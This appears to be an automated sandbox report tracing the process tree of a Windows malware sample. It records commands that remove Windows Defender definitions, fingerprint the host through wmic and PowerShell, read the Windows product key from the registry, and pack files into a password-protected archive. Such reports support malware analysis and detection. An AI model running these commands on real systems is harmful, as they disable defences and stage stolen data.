                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:51
                                                                                                                                                                                                                                    Start time:13:44:13
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:52
                                                                                                                                                                                                                                    Start time:13:44:14
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:tree /A /F
                                                                                                                                                                                                                                    Imagebase:0x7ff6934b0000
                                                                                                                                                                                                                                    File size:20'992 bytes
                                                                                                                                                                                                                                    MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:53
                                                                                                                                                                                                                                    Start time:13:44:14
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES74CA.tmp" "c:\Users\user\AppData\Local\Temp\bcdu5fii\CSC91B7380AF2C2414A909984B12C6688DE.TMP"
                                                                                                                                                                                                                                    Imagebase:0x7ff66c690000
                                                                                                                                                                                                                                    File size:52'744 bytes
                                                                                                                                                                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:54
                                                                                                                                                                                                                                    Start time:13:44:15
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:55
                                                                                                                                                                                                                                    Start time:13:44:15
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:56
                                                                                                                                                                                                                                    Start time:13:44:15
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:tree /A /F
                                                                                                                                                                                                                                    Imagebase:0x7ff6934b0000
                                                                                                                                                                                                                                    File size:20'992 bytes
                                                                                                                                                                                                                                    MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:57
                                                                                                                                                                                                                                    Start time:13:44:15
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:58
                                                                                                                                                                                                                                    Start time:13:44:15
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:59
                                                                                                                                                                                                                                    Start time:13:44:15
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:tree /A /F
                                                                                                                                                                                                                                    Imagebase:0x7ff6934b0000
                                                                                                                                                                                                                                    File size:20'992 bytes
                                                                                                                                                                                                                                    MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:63
                                                                                                                                                                                                                                    Start time:13:44:24
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:64
                                                                                                                                                                                                                                    Start time:13:44:24
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:65
                                                                                                                                                                                                                                    Start time:13:44:24
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *
                                                                                                                                                                                                                                    Imagebase:0x7ff69a3e0000
                                                                                                                                                                                                                                    File size:630'736 bytes
                                                                                                                                                                                                                                    MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:66
                                                                                                                                                                                                                                    Start time:13:44:26
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:67
                                                                                                                                                                                                                                    Start time:13:44:26
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:68
                                                                                                                                                                                                                                    Start time:13:44:26
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:wmic os get Caption
                                                                                                                                                                                                                                    Imagebase:0x7ff65aee0000
                                                                                                                                                                                                                                    File size:576'000 bytes
                                                                                                                                                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:69
                                                                                                                                                                                                                                    Start time:13:44:26
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                                    Imagebase:0x7ff7332e0000
                                                                                                                                                                                                                                    File size:468'120 bytes
                                                                                                                                                                                                                                    MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:70
                                                                                                                                                                                                                                    Start time:13:44:27
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:71
                                                                                                                                                                                                                                    Start time:13:44:27
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:72
                                                                                                                                                                                                                                    Start time:13:44:27
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:wmic computersystem get totalphysicalmemory
                                                                                                                                                                                                                                    Imagebase:0x7ff65aee0000
                                                                                                                                                                                                                                    File size:576'000 bytes
                                                                                                                                                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:73
                                                                                                                                                                                                                                    Start time:13:44:28
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:74
                                                                                                                                                                                                                                    Start time:13:44:28
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:75
                                                                                                                                                                                                                                    Start time:13:44:28
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                    Imagebase:0x7ff65aee0000
                                                                                                                                                                                                                                    File size:576'000 bytes
                                                                                                                                                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:76
                                                                                                                                                                                                                                    Start time:13:44:29
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:77
                                                                                                                                                                                                                                    Start time:13:44:29
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:78
                                                                                                                                                                                                                                    Start time:13:44:29
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:79
                                                                                                                                                                                                                                    Start time:13:44:30
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:80
                                                                                                                                                                                                                                    Start time:13:44:30
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:81
                                                                                                                                                                                                                                    Start time:13:44:30
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                    Imagebase:0x7ff65aee0000
                                                                                                                                                                                                                                    File size:576'000 bytes
                                                                                                                                                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:82
                                                                                                                                                                                                                                    Start time:13:44:30
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:83
                                                                                                                                                                                                                                    Start time:13:44:30
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:84
                                                                                                                                                                                                                                    Start time:13:44:30
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:8.7%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                      Signature Coverage:14.9%
                                                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                                                      Total number of Limit Nodes:34
